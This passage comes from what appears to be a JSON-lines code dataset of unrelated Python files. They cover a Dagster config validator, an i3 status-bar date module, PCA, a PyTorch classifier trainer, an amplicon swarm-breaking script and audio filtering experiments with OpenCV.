of_type=EvaluationError),\n )\n\n def errors_at_level(self, *levels):\n return list(self._iterate_errors_at_level(list(levels)))\n\n def _iterate_errors_at_level(self, levels):\n check.list_param(levels, 'levels', of_type=str)\n for error in self.errors:\n if error.stack.levels == levels:\n yield error\n\n\ndef stack_with_field(stack, field_name, field_def):\n return EvaluationStack(\n config_type=stack.config_type,\n entries=stack.entries + [EvaluationStackPathEntry(field_name, field_def)],\n )\n\n\ndef stack_with_list_index(stack, list_index):\n list_type = stack.type_in_context\n check.invariant(list_type.is_list)\n return EvaluationStack(\n config_type=stack.config_type,\n entries=stack.entries + [EvaluationStackListItemEntry(list_type.inner_type, list_index)],\n )\n\n\ndef hard_create_config_value(config_type, config_value):\n check.inst_param(config_type, 'config_type', ConfigType)\n result = evaluate_config_value(config_type, config_value)\n check.invariant(result.success)\n return result.value\n\n\ndef evaluate_config_value(config_type, config_value):\n check.inst_param(config_type, 'config_type', ConfigType)\n errors = validate_config(config_type, config_value)\n if errors:\n return EvaluateValueResult(success=False, value=None, errors=errors)\n\n value = apply_default_values(config_type, config_value)\n\n return EvaluateValueResult(success=True, value=value, errors=[])\n\n\ndef validate_config(config_type, config_value):\n check.inst_param(config_type, 'config_type', ConfigType)\n\n return list(\n _validate_config(\n config_type, config_value, 
EvaluationStack(config_type=config_type, entries=[])\n )\n )\n\n\ndef _validate_config(config_type, config_value, stack):\n check.inst_param(config_type, 'config_type', ConfigType)\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if config_type.is_scalar:\n if not config_type.is_config_scalar_valid(config_value):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value \"{value}\" {path_msg} is not valid. Expected \"{type_name}\"'.format(\n path_msg=_get_friendly_path_msg(stack),\n value=config_value,\n type_name=config_type.name,\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=config_type, value_rep=repr(config_value)\n ),\n )\n return\n\n errors = []\n\n if config_type.is_any:\n # no-op: we're safe\n return\n elif config_type.is_selector:\n errors = validate_selector_config_value(config_type, config_value, stack)\n elif config_type.is_composite:\n errors = validate_composite_config_value(config_type, config_value, stack)\n elif config_type.is_list:\n errors = validate_list_value(config_type, config_value, stack)\n elif config_type.is_nullable:\n errors = (\n []\n if config_value is None\n else _validate_config(config_type.inner_type, config_value, stack)\n )\n elif config_type.is_enum:\n errors = validate_enum_value(config_type, config_value, stack)\n else:\n check.failed('Unsupported type {name}'.format(name=config_type.name))\n\n for error in errors:\n yield error\n\n\ndef validate_enum_value(enum_type, config_value, stack):\n check.param_invariant(enum_type.is_enum, 'enum_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if not isinstance(config_value, six.string_types):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value for enum type {type_name} must be a string got {value}'.format(\n type_name=enum_type.name, value=config_value\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=enum_type, value_rep=repr(config_value)\n ),\n )\n return\n\n if not enum_type.is_valid_config_enum_value(config_value):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message=(\n 'Value not in enum type {type_name}. Got: {value}. '\n 'Possible values: {possible_values}.'\n ).format(\n type_name=enum_type.name,\n value=repr(config_value),\n possible_values=enum_type.config_values,\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=enum_type, value_rep=repr(config_value)\n ),\n )\n return\n\n\n## Selectors\n\n\ndef validate_selector_config_value(selector_type, config_value, stack):\n check.param_invariant(selector_type.is_selector, 'selector_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if config_value and not isinstance(config_value, dict):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value for selector type {type_name} must be a dict got {value}'.format(\n type_name=selector_type.name, value=config_value\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=selector_type, value_rep=repr(config_value)\n ),\n )\n return\n\n if config_value and len(config_value) > 1:\n incoming_fields = sorted(list(config_value.keys()))\n defined_fields = sorted(list(selector_type.fields.keys()))\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR,\n message=(\n 'You can only specify a single field. You specified {incoming_fields}. 
'\n 'The available fields are {defined_fields}'\n ).format(incoming_fields=incoming_fields, defined_fields=defined_fields),\n error_data=SelectorTypeErrorData(\n dagster_type=selector_type, incoming_fields=incoming_fields\n ),\n )\n return\n\n elif not config_value:\n defined_fields = sorted(list(selector_type.fields.keys()))\n if len(selector_type.fields) > 1:\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR,\n message=(\n 'Must specify a field if more one defined. Defined fields: ' '{defined_fields}'\n ).format(defined_fields=defined_fields),\n error_data=SelectorTypeErrorData(dagster_type=selector_type, incoming_fields=[]),\n )\n return\n\n field_name, field_def = single_item(selector_type.fields)\n\n if not field_def.is_optional:\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR,\n message=(\n 'Must specify the required field. Defined fields: ' '{defined_fields}'\n ).format(defined_fields=defined_fields),\n error_data=SelectorTypeErrorData(dagster_type=selector_type, incoming_fields=[]),\n )\n return\n\n incoming_field_value = field_def.default_value if field_def.default_provided else None\n\n else:\n check.invariant(config_value and len(config_value) == 1)\n\n field_name, incoming_field_value = single_item(config_value)\n if field_name not in selector_type.fields:\n print('calling ' + 'create_field_not_defined_error')\n yield create_field_not_defined_error(selector_type, stack, field_name)\n return\n\n parent_field = selector_type.fields[field_name]\n for error in _validate_config(\n parent_field.config_type,\n incoming_field_value,\n stack_with_field(stack, field_name, parent_field),\n ):\n yield error\n\n\n## Composites\n\n\ndef validate_composite_config_value(composite_type, config_value, stack):\n check.inst_param(composite_type, 'composite_type', ConfigType)\n check.param_invariant(composite_type.is_composite, 'composite_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n path_msg, _path = _get_friendly_path_info(stack)\n\n if config_value and not isinstance(config_value, dict):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value {value} {path_msg} must be dict. 
Expected: \"{type_name}\".'.format(\n path_msg=path_msg,\n type_name=print_config_type_to_string(composite_type, with_lines=False),\n value=config_value,\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=composite_type, value_rep=repr(config_value)\n ),\n )\n return\n\n # ASK: this can crash on user error\n config_value = check.opt_dict_param(config_value, 'incoming_value', key_type=str)\n\n fields = composite_type.fields\n\n defined_fields = set(fields.keys())\n incoming_fields = set(config_value.keys())\n\n for received_field in incoming_fields:\n if received_field not in defined_fields:\n yield create_field_not_defined_error(composite_type, stack, received_field)\n\n for expected_field, field_def in fields.items():\n if expected_field in incoming_fields:\n for error in _validate_config(\n field_def.config_type,\n config_value[expected_field],\n stack_with_field(stack, expected_field, field_def),\n ):\n yield error\n\n elif field_def.is_optional:\n pass\n\n else:\n check.invariant(not field_def.default_provided)\n yield create_missing_required_field_error(composite_type, stack, expected_field)\n\n\n## Lists\n\n\ndef validate_list_value(list_type, config_value, stack):\n check.param_invariant(list_type.is_list, 'list_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if not isinstance(config_value, list):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value {value} {path_msg} must be list. Expected: {type_name}'.format(\n path_msg=_get_friendly_path_msg(stack),\n value=config_value,\n type_name=print_config_type_to_string(list_type, with_lines=False),\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=list_type, value_rep=repr(config_value)\n ),\n )\n return\n\n for index, item in enumerate(config_value):\n for error in _validate_config(\n list_type.inner_type, item, stack_with_list_index(stack, index)\n ):\n yield error\n\n\ndef create_field_not_defined_error(config_type, stack, received_field):\n check.param_invariant(config_type.has_fields, 'config_type')\n return EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.FIELD_NOT_DEFINED,\n message='Field \"{received}\" is not defined {path_msg} Expected: \"{type_name}\"'.format(\n path_msg=_get_friendly_path_msg(stack),\n type_name=print_config_type_to_string(config_type, with_lines=False),\n received=received_field,\n ),\n error_data=FieldNotDefinedErrorData(field_name=received_field),\n )\n\n\ndef create_missing_required_field_error(config_type, stack, expected_field):\n check.param_invariant(config_type.has_fields, 'config_type')\n return EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.MISSING_REQUIRED_FIELD,\n message='Missing required field \"{expected}\" {path_msg} Expected: \"{type_name}\".'.format(\n expected=expected_field,\n path_msg=_get_friendly_path_msg(stack),\n type_name=print_config_type_to_string(config_type, with_lines=False),\n ),\n error_data=MissingFieldErrorData(\n field_name=expected_field, field_def=config_type.fields[expected_field]\n ),\n )\n","sub_path":"python_modules/dagster/dagster/core/types/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":20011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"618850769","text":"from subprocess import check_output\nfrom time import time\n\nclass Py3status:\n\tdef date(self, i3status_output_json, i3status_config):\n\t\tresponse = {'name': 
'date'}\n\t\tresponse['full_text'] = check_output([\"date\", \"+\\\"%a %b %d, %I:%M %p\\\"\"])[1:-2]\n\t\tresponse['cached_until'] = time() + 5\n\n\t\treturn (-1, response)\n\n\tdef on_click(self, i3status_output_json, i3status_config, event):\n\t\tempty = check_output(['terminator', '-x', 'calcurse'])","sub_path":"date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"440482235","text":"import numpy as np\n\ndef loadDataSet(filename, delim='\\t'):\n    with open(filename) as f:\n        stringArr = [line.strip().split(delim) for line in f.readlines()]\n        dataArr = [list(map(float, line)) for line in stringArr]\n    return dataArr\n\n'''\nimport mycode.Ch13.pca as pca\nimport numpy as np\ndataArr = pca.loadDataSet('./mycode/Ch13/testSet.txt')\nlowDMat, reconMat = pca.pca(dataArr)\npca.plot(np.mat(dataArr), reconMat)\n\nfrom importlib import reload\n'''\ndef pca(dataSet, topNfeat=9999999):\n    dataMat = np.mat(dataSet)\n    meanVals = np.mean(dataMat, axis=0)\n    meanRemoved = dataMat - meanVals\n    covMat = np.cov(meanRemoved, rowvar=0) # covariance matrix\n    eigVals, eigVects = np.linalg.eig(np.mat(covMat)) # solve for eigenvalues and eigenvectors; the eigenvectors are column vectors\n    eigValIndex = np.argsort(eigVals)\n    eigValIndex = eigValIndex[:-(topNfeat+1):-1] # take the indices of the topNfeat largest eigenvalues\n    redEigVects = eigVects[:,eigValIndex]\n    lowDDataMat = meanRemoved * redEigVects\n    reconMat = (lowDDataMat * redEigVects.T) + meanVals\n    print(eigVects)\n    print(redEigVects)\n    print(eigVects * eigVects.T)\n    print(redEigVects * redEigVects.T)\n    return lowDDataMat, reconMat\n\ndef plot(dataMat, reconMat):\n    import matplotlib.pyplot as plt\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    ax.scatter(dataMat[:,0].flatten().A[0], dataMat[:,1].flatten().A[0], marker='^', s=90)\n    ax.scatter(reconMat[:,0].flatten().A[0], reconMat[:,1].flatten().A[0], marker='o', s=50, c='red')\n    plt.show()","sub_path":"mycode/Ch13/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"597175002","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Reproduced from:\n# Mahé F, Rognes T, Quince C, de Vargas C, Dunthorn M. (2014) \n# Swarm: robust and fast clustering method for amplicon-based studies. \n# PeerJ 2:e593 https://doi.org/10.7717/peerj.593\n#\n# Supplement 8: https://doi.org/10.7717/peerj.593/supp-8\n\n\n\n\"\"\"\n    Detect and break chains of amplicons in a swarm.\n\"\"\"\n\nfrom __future__ import print_function\n\n__author__ = \"Frédéric Mahé \"\n__date__ = \"2014/01/30\"\n__version__ = \"$Revision: 1.1\"\n\nimport os\nimport sys\nimport tempfile\nimport itertools\nimport subprocess\nfrom operator import itemgetter\nfrom optparse import OptionParser\n\n#*****************************************************************************#\n#                                                                             #\n#                                  Functions                                  #\n#                                                                             #\n#*****************************************************************************#\n\n\ndef option_parse():\n    \"\"\"\n    Parse arguments from command line.\n    \"\"\"\n    desc = \"\"\"Detect and break chains of amplicons in a swarm. That\n    script will search for the swarm binary in /usr/bin/. 
If swarm is\n installed at a different location, please modify the corresponding\n line in the function run_swarm.\"\"\"\n\n parser = OptionParser(usage=\"usage: %prog -f filename -s filename\",\n description=desc,\n version=\"%prog version 1.1\")\n\n parser.add_option(\"-b\", \"--binary\",\n metavar=\"\",\n action=\"store\",\n default=\"/usr/bin/swarm\",\n dest=\"binary\",\n help=\"swarm binary location. Default is /usr/bin/swarm\")\n\n parser.add_option(\"-f\", \"--fasta_file\",\n metavar=\"\",\n action=\"store\",\n dest=\"fasta_file\",\n help=\"set as fasta file.\")\n\n parser.add_option(\"-s\", \"--swarm_file\",\n metavar=\"\",\n action=\"store\",\n dest=\"swarm_file\",\n help=\"set as swarm file.\")\n\n parser.add_option(\"-d\", \"--differences\",\n metavar=\"\",\n action=\"store\",\n type=\"int\",\n default=1,\n dest=\"threshold\",\n help=\"set local clustering . Default is 1\")\n\n (options, args) = parser.parse_args()\n return options.binary, options.fasta_file, options.swarm_file, options.threshold\n\n\ndef fasta_parse(fasta_file):\n \"\"\"\n List amplicon ids, abundances and sequences, make a list and a dictionary\n \"\"\"\n with open(fasta_file, \"rU\") as fasta_file:\n all_amplicons = dict()\n for line in fasta_file:\n if line.startswith(\">\"):\n amplicon, abundance = line.strip(\">\\n\").split(\"_\")\n else:\n sequence = line.strip()\n all_amplicons[amplicon] = (int(abundance), sequence)\n return all_amplicons\n\n\ndef swarm_parse(swarm_file):\n \"\"\"\n List amplicons contained in each swarms, sort by decreasing\n abundance. Sort the list of swarms by decreasing mass and\n decreasing size.\n \"\"\"\n with open(swarm_file, \"rU\") as swarm_file:\n swarms = list()\n for line in swarm_file:\n amplicons = [(amplicon.split(\"_\")[0], int(amplicon.split(\"_\")[1]))\n for amplicon in line.strip().split(\" \")]\n # Sort amplicons by decreasing abundance and alphabetical order\n amplicons.sort(key=itemgetter(1, 0), reverse=True)\n top_amplicon, top_abundance = amplicons[0]\n swarm_size = len(amplicons)\n swarm_mass = sum([amplicon[1] for amplicon in amplicons])\n swarms.append([top_amplicon, swarm_mass, swarm_size,\n top_abundance, amplicons])\n # Sort swarms on mass, size and seed name\n swarms.sort(key=itemgetter(1, 2, 0), reverse=True)\n return swarms\n\n\ndef run_swarm(binary, all_amplicons, swarm, threshold):\n \"\"\"\n Write temporary fasta files, run swarm and collect the graph data\n \"\"\"\n swarm_command = [binary, \"-b\", \"-d\", str(threshold)]\n with open(os.devnull, \"w\") as devnull:\n with tempfile.SpooledTemporaryFile() as tmp_fasta_file:\n with tempfile.SpooledTemporaryFile() as tmp_swarm_results:\n for amplicon, abundance in swarm:\n sequence = all_amplicons[amplicon][1]\n print(\">\", amplicon, \"_\", str(abundance), \"\\n\", sequence,\n sep=\"\", file=tmp_fasta_file)\n tmp_fasta_file.seek(0) # rewind to the begining of the file\n proc = subprocess.Popen(swarm_command,\n stderr=tmp_swarm_results,\n stdout=devnull,\n stdin=tmp_fasta_file,\n close_fds=True)\n proc.wait() # usefull or not?\n tmp_swarm_results.seek(0) # rewind to the begining of the file\n graph_data = [line.strip().split(\"\\t\")[1:4]\n for line in tmp_swarm_results\n if line.startswith(\"@\")]\n return graph_data\n\n\ndef build_graph(graph_data):\n \"\"\"\n List pairwise relations in a swarm. Note that not all pairwise\n relations are stored. 
That's why the graph exploration must always\n start from the most abundant amplicon, and must be reiterated for\n sub-swarms after a breaking.\n \"\"\"\n graph = dict()\n for line in graph_data:\n ampliconA, ampliconB, differences = line\n if ampliconA in graph:\n graph[ampliconA] += [ampliconB]\n else:\n graph[ampliconA] = [ampliconB]\n return graph\n\n\ndef find_path(graph, start, end, path=[]):\n \"\"\"\n Recursively explore the graph and find all paths connecting two\n amplicons (http://www.python.org/doc/essays/graphs.html). As the\n graph is not complete, some pairs of amplicon cannot be linked.\n \"\"\"\n path = path + [start]\n if start == end:\n return path\n if start not in graph:\n return None\n for node in graph[start]:\n if node not in path:\n newpath = find_path(graph, node, end, path)\n if newpath:\n return newpath\n return None\n\n\ndef graph_breaker(amplicons, graph, all_amplicons, ABUNDANT):\n \"\"\"\n Find deep valleys and cut the graph\n \"\"\"\n # High peaks to test (starting and ending points)\n top_amplicons = [amplicon[0] for amplicon in amplicons\n if amplicon[1] >= ABUNDANT]\n # Ending peak is RATIO times higher than the valley\n RATIO = 50\n # Debugging\n print(\"## OTU \", top_amplicons[0], \"\\n\", \"# List potential bridges\",\n sep=\"\", file=sys.stderr)\n # Initialize the list of new seeds\n new_swarm_seeds = [top_amplicons[0]]\n # Break if there is no second peak\n if len(top_amplicons) < 2:\n return new_swarm_seeds, graph\n # Loop over the list of top amplicons\n pairs_of_peaks = itertools.combinations(top_amplicons, 2)\n for pair_of_peaks in pairs_of_peaks:\n start_amplicon, end_amplicon = pair_of_peaks\n path = find_path(graph, start_amplicon, end_amplicon)\n # Path can be empty if the relation have been deleted\n if path and len(path) > 1:\n abundances = [int(all_amplicons[node][0]) for node in path]\n # Find the weakest spot\n lowest = min(abundances)\n if lowest != abundances[-1]:\n # LOW VALLEY MODEL (CHANGE HERE)\n if (abundances[-1] / lowest > RATIO / 2 and abundances[0] / abundances[-1] < 10) or abundances[-1] / lowest >= RATIO:\n # Debugging\n print(abundances, \"\\tBREAK!\", file=sys.stderr)\n # Find the rightmost occurence of the lowest point\n index = len(abundances) - (abundances[::-1].index(lowest) + 1)\n left_amplicon = path[index-1]\n right_amplicon = path[index]\n # Delete the relation from the graph\n graph[left_amplicon].remove(right_amplicon)\n # Remove the graph entry if the relation is now empty\n if not graph[left_amplicon]:\n del graph[left_amplicon]\n # Lowest point will be a new swarm seed\n new_swarm_seeds.append(right_amplicon)\n else:\n print(abundances, file=sys.stderr)\n return new_swarm_seeds, graph\n\n\ndef swarmer(graph, seed, path=[]):\n \"\"\"\n Recursively explore the graph and find all amplicons linked to the\n seed\n \"\"\"\n path = path + [seed]\n if seed in graph:\n for node in graph[seed]:\n path = swarmer(graph, node, path)\n return path\n\n\ndef swarm_breaker(binary, all_amplicons, swarms, threshold):\n \"\"\"\n Recursively inspect and break the newly produced swarms\n \"\"\"\n # ARBITRARY PARAMETERS\n ABUNDANT = 100\n # Deal with each swarm\n for swarm in swarms:\n top_amplicon, swarm_mass, swarm_size, top_abundance, amplicons = swarm\n if swarm_size > 2 and top_abundance > ABUNDANT:\n # Run swarm to get the pairwise relationships\n graph_raw_data = run_swarm(binary, all_amplicons, amplicons, threshold)\n # Build the graph of pairwise relationships\n graph = build_graph(graph_raw_data)\n new_swarm_seeds, graph 
= graph_breaker(amplicons, graph,\n all_amplicons, ABUNDANT)\n # Explore the graph and find all amplicons linked to the seeds\n observed = 0\n new_swarms = list()\n for seed in new_swarm_seeds:\n new_swarm = swarmer(graph, seed)\n observed += len(new_swarm)\n # Give to the new swarms the same structure and\n # re-order them by decreasing abundance\n amplicons = [(amplicon, all_amplicons[amplicon][0])\n for amplicon in new_swarm]\n amplicons.sort(key=itemgetter(1), reverse=True)\n top_amplicon, top_abundance = amplicons[0]\n swarm_size = len(amplicons)\n swarm_mass = sum([amplicon[1] for amplicon in amplicons])\n new_swarms.append([top_amplicon, swarm_mass,\n swarm_size, top_abundance, amplicons])\n # Deal with the new swarms (no need to treat again the\n # first swarm). There will always be at least one swarm in\n # new_swarms.\n print(\" \".join([\"_\".join([amplicon[0], str(amplicon[1])])\n for amplicon in new_swarms[0][4]]), file=sys.stdout)\n new_swarms.pop(0)\n if new_swarms:\n # Sort the rest of the new swarms by decreasing mass\n # and size. Inject them into swarm_breaker.\n new_swarms.sort(key=itemgetter(1, 2), reverse=True)\n swarm_breaker(binary, all_amplicons, new_swarms, threshold)\n else:\n # Output the swarm\n print(\" \".join([\"_\".join([amplicon[0], str(amplicon[1])])\n for amplicon in amplicons]), file=sys.stdout)\n return None\n\n\ndef main():\n \"\"\"\n Hypothesis: chain of amplicons happen among the most abundant\n amplicons of the swarm. The number of chains in a swarm is\n small. The abundances of each sub-swarm centroids are\n comparable. The \"valleys\" are deep compared to the \"peaks\". Swarm\n graphs are acyclical, so there is only one path joining two\n amplicons.\n\n Synopsis: Break bridges as you discover them. Find the weakest\n point in the chain, break on the left of that point and mark it as\n the seed of a new swarm. Repeat the process with the nth most\n abundant amplicon, until all amplicons in the arbitrary range have\n been treated.\n \"\"\"\n # Parse command line options.\n binary, fasta_file, swarm_file, threshold = option_parse()\n # Load all amplicon ids, abundances and sequences\n all_amplicons = fasta_parse(fasta_file)\n # Load the swarming data\n swarms = swarm_parse(swarm_file)\n # Deal with each swarm\n swarm_breaker(binary, all_amplicons, swarms, threshold)\n\n\n#*****************************************************************************#\n# #\n# Body #\n# #\n#*****************************************************************************#\n\nif __name__ == '__main__':\n\n main()\n\nsys.exit(0)\n","sub_path":"scripts/swarm_breaker.py","file_name":"swarm_breaker.py","file_ext":"py","file_size_in_byte":13168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"279038949","text":"'''\n 1010. 
Prefix Primes\n\n    For the number \"2333\", its prefixes \"2\", \"23\", \"233\", and \"2333\" are all prime.\n    Given a length n, print all prefix primes of length n.\n'''\n\nimport math\ndef isPrime(num):\n    state = True\n    for i in range(2, int(math.sqrt(num))+1):\n        if num % i == 0:\n            state = False\n\n    return state\n\nnum = 6\nif isPrime(num):\n    print('True')\nelse:\n    print('False')","sub_path":"coding practice/Judge/1010.py","file_name":"1010.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"354306113","text":"# ../ImageClassifier/flowers\n\n__author__ = \"Chris\"\n\nimport argparse\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms, models\n\nfrom utilities import pipeline\nfrom functions import build_classifier, train_model, test_model, save_model\n\n# Create parser object and tell it what arguments to expect\nparser = argparse.ArgumentParser(description='NN Trainer')\n# ../ImageClassifier/flowers\n# Specify argument for the training data directory\nparser.add_argument('train_data_dir',\n                    action='store',\n                    help='Training data path')\n# Specify argument for pretrained neural network\nparser.add_argument('--arch',\n                    action='store',\n                    dest='pretrained_model',\n                    default='vgg11',\n                    help = 'Pretrained model to implement; defaults to VGG-11; \\\n                    can work with VGG and Densenet architectures')\n# Specify argument to store model checkpoint\nparser.add_argument('--save_dir',\n                    action='store',\n                    dest='save_dir',\n                    default='checkpoint.pth',\n                    help='Location to save the model checkpoint')\n# Specify argument for the learning rate\nparser.add_argument('--learn_rate',\n                    action='store',\n                    dest='lr',\n                    type=float,\n                    default=0.03,\n                    help='Learning rate for the training model; default 0.03; \\\n                    float type')\n# Specify argument for the dropout probability\nparser.add_argument('--dropout',\n                    action='store',\n                    dest='drop_out',\n                    type=float,\n                    default=0.02,\n                    help='Dropout for training model; default 0.02; \\\n                    float type')\n# Specify argument for the number of hidden units\nparser.add_argument('--hidden_units',\n                    action='store',\n                    dest='hidden_units',\n                    type=int,\n                    default=500,\n                    help='Number of hidden classifier units; default 500; \\\n                    int type')\n# Specify argument for the number of classes to categorize\nparser.add_argument('--classes',\n                    action='store',\n                    dest='classes',\n                    type=int,\n                    default=102,\n                    help='Number of classes to categorize; default 102; \\\n                    int type')\n# Specify argument for the number of epochs\nparser.add_argument('--epochs',\n                    action='store',\n                    dest='epochs',\n                    type=int,\n                    default=1,\n                    help='Number of training epochs; default 1; \\\n                    int type')\n# Specify argument for GPU mode\nparser.add_argument('--gpu',\n                    action='store_true',\n                    default=False,\n                    help='Turn GPU mode on; default False; \\\n                    bool type')\n# Assign arguments\nresults = parser.parse_args()\ndata_dir = results.train_data_dir\nsave_dir = results.save_dir\nlearning_rate = results.lr\ndropout = results.drop_out\nhidden_units = results.hidden_units\nclasses = results.classes\nepochs = results.epochs\ngpu = results.gpu\n## Completion of argument assignment ##\n\n## Define data and model specifics\n\n# Data pipeline\ntrain_loader, valid_loader, test_loader, train_data, valid_data, test_data = pipeline(data_dir)\n# Load model\n# Returns the value of the named attribute of an object\npre_trained_model = results.pretrained_model\nmodel = getattr(models, pre_trained_model)(pretrained=True)\n\n# Build 
and attach a new classifier\ninput_units = model.classifier[0].in_features\nbuild_classifier(model, input_units, hidden_units, classes, dropout)\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.classifier.parameters(), learning_rate)\n\n# Train the model\nmodel, optimizer = train_model(model,epochs,train_loader,valid_loader,criterion,optimizer,gpu)\n\n# Test the model\ntest_model(model,test_loader,gpu)\n# Save the model\nsave_model(model,train_data,optimizer,save_dir,epochs)\n","sub_path":"Udacity/IntroductionToMachineLearningProgram/Part3_DeepLearning/Deep Learning With Pytorch/Project/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"380787726","text":"import cv2\nimport scipy.io.wavfile\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport math\nfrom scipy.fftpack import fft\n\nrate,data=scipy.io.wavfile.read('project.wav')\n\n#resize\nscaledwav=cv2.resize(data,None,fx=1,fy=0.5)\nscaledwav = np.asarray(scaledwav, dtype=np.int16)\nscipy.io.wavfile.write('./music/resize05.wav',rate,scaledwav)\nscaledwav=cv2.resize(data,None,fx=1,fy=1.5)\nscaledwav = np.asarray(scaledwav, dtype=np.int16)\nscipy.io.wavfile.write('./music/resize15.wav',rate,scaledwav)\n#resize\n\n#gaussian noise\nstd=np.std(data)\nmean=np.mean(data)\nnoise = np.random.normal(mean*0.001,std,data.size)\nnoise=noise.reshape(int(data.size/2),2)\nnoised=np.add(data,noise)\nnoised = np.asarray(noised, dtype=np.int16)\nscipy.io.wavfile.write('./music/noise.wav',rate,noised)\n#gaussian noise\n\n#gaussian blur\nblurO = cv2.GaussianBlur(data, (55,55), 0)\nscipy.io.wavfile.write('./music/blurO.wav',rate,blurO)\nblur2 = cv2.GaussianBlur(noised, (105,105), 0)\nscipy.io.wavfile.write('./music/blur2.wav',rate,blur2)\nblur1 = cv2.GaussianBlur(noised, (55,55), 0)\nscipy.io.wavfile.write('./music/blur1.wav',rate,blur1)\nblur = cv2.GaussianBlur(noised, (25,25), 0)\nscipy.io.wavfile.write('./music/blur.wav',rate,blur)\ndur=data[:,0].size/44100\nx=np.linspace(0,6,dur*44100) \nplt.subplot(621)\nplt.plot(x,data[:,0])\nplt.title('Original wave')\nplt.subplot(622)\nplt.plot(x,blurO[:,0])\nplt.title('Blur Original wave')\nplt.subplot(623)\nplt.plot(x,noised[:,0])\nplt.title('Noise wave')\nplt.subplot(624)\nplt.plot(x,blur[:,0])\nplt.title('Blur Noise size small wave')\nplt.subplot(625)\nplt.plot(x,blur1[:,0])\nplt.title('Blur Noise size mid wave')\nplt.subplot(626)\nplt.plot(x,blur2[:,0])\nplt.title('Blur Noise size large wave')\n#plt.show()\nimg = cv2.imread('openingtest.jpg')\ntestblur = cv2.GaussianBlur(img, (15,15), 0)\ncv2.imwrite('gblur.jpg', testblur)\n#gaussian blur\n\n#opening,dilation,erosion\nkernel = np.ones((3,3),np.int16)\nerosion = cv2.erode(noised,kernel,iterations = 1)\nscipy.io.wavfile.write('./music/erosion.wav',rate,erosion)\ndilation = cv2.dilate(noised,kernel,iterations = 1)\nscipy.io.wavfile.write('./music/dilation.wav',rate,dilation)\nopening = cv2.morphologyEx(noised, cv2.MORPH_OPEN, kernel)\nscipy.io.wavfile.write('./music/opening.wav',rate,opening)\nkernel = np.ones((5,5),np.uint8)\nimg = cv2.imread('openingtest.jpg')\nopening = cv2.morphologyEx(img, cv2.MORPH_OPEN, kernel)\ncv2.imwrite('opening.jpg', opening)\n#opening,dilation,erosion\n\n#sharpen\nrate,data=scipy.io.wavfile.read('project.wav')\nkernel_sharpen = np.array([[-1,-1,-1], [-1,9,-1], [-1,-1,-1]])\noutput = cv2.filter2D(data, -1, 
kernel_sharpen)\nscipy.io.wavfile.write('./music/sharpen.wav',rate,output)\nplt.subplot(211)\nplt.plot(x,data[:,0])\nplt.title('Original')\nplt.subplot(212)\nplt.plot(x,output[:,0])\nplt.title('Sharpen')\n#plt.show()\n#sharpen\n\n#contrast dark bright\ncontrast25 = cv2.addWeighted(data, 2.5, np.zeros(data.shape, data.dtype), 0, 0)\nscipy.io.wavfile.write('./music/contrast25.wav',rate,contrast25)\ncontrast01 = cv2.addWeighted(data, 0.1, np.zeros(data.shape, data.dtype), 0, 0)\nscipy.io.wavfile.write('./music/contrast01.wav',rate,contrast01)\nbright=np.add(data,np.ones(data.shape, data.dtype)*5000)\nscipy.io.wavfile.write('./music/bright.wav',rate,bright)\ndark=np.add(data,np.ones(data.shape, data.dtype)*-5000)\nscipy.io.wavfile.write('./music/dark.wav',rate,dark)\n#contrast dark bright\n\n#mix channel\neasonrate,eason=scipy.io.wavfile.read('1channelmusic.wav')\nmix=[]\na=eason.shape\nfor i in range(a[0]):\n mix.append(int((eason[i][0]+eason[i][1])/2))\nmix=np.array(mix)\nmix = np.asarray(mix, 